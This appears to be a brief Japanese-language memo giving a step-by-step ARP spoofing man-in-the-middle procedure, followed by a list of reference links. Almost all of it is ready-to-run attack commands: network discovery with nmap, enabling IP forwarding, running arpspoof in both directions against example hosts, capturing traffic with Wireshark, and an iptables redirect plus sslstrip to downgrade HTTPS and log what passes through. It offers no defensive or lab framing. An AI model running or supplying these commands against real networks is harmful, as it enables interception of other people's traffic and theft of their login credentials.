ARPスプーフィング手順 ( 中間者攻撃 , MITM )


1. 攻撃対象のIPアドレス取得

ifconfig
arp -a
nmap -F 192.168.XXX.XXX/24

などなど

2. 攻撃者のPCを経由するパケットをフォワードさせるためにIPフォワーディングを有効

1で有効

echo 1 > /proc/sys/net/ipv4/ip_forward

0で無効

echo 0 > /proc/sys/net/ipv4/ip_forward

3. ARPテーブル書き換え

NICを wlan0 に指定して,192.168.100.123 のARPテーブルにある 192.168.100.124 のMACアドレスを攻撃者(自身)のMACアドレスに書き換える

sudo arpspoof -i wlan0 -t 192.168.100.123 192.168.100.124

NICを wlan0 に指定して,192.168.100.124 のARPテーブルにある 192.168.100.123 のMACアドレスを攻撃者(自身)のMACアドレスに書き換える

sudo arpspoof -i wlan0 -t 192.168.100.124 192.168.100.123

注意:送信と受信両方が攻撃者PCを経由して通信するようにする為,別ターミナルで2回実行する必要がある!

4. パケットキャプチャ

wireshark

5. sslストリップ

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -l 8080
cat sslstrip.log

6. 参考文献

https://qiita.com/kinokoruumu/items/a4d98c5a55243b5afe96
https://www.slideshare.net/sonickun/arp-39782351
https://network-beginner.xyz/sslstrip
https://tutorialmore.com/questions-594005.htm
https://netwiz.jp/arp-spoofing/
https://www.atmarkit.co.jp/ait/articles/0305/09/news003_3.html
https://milestone-of-se.nesuke.com/nw-basic/ethernet/gratuitous-arp/
https://network-beginner.xyz/dns_spoof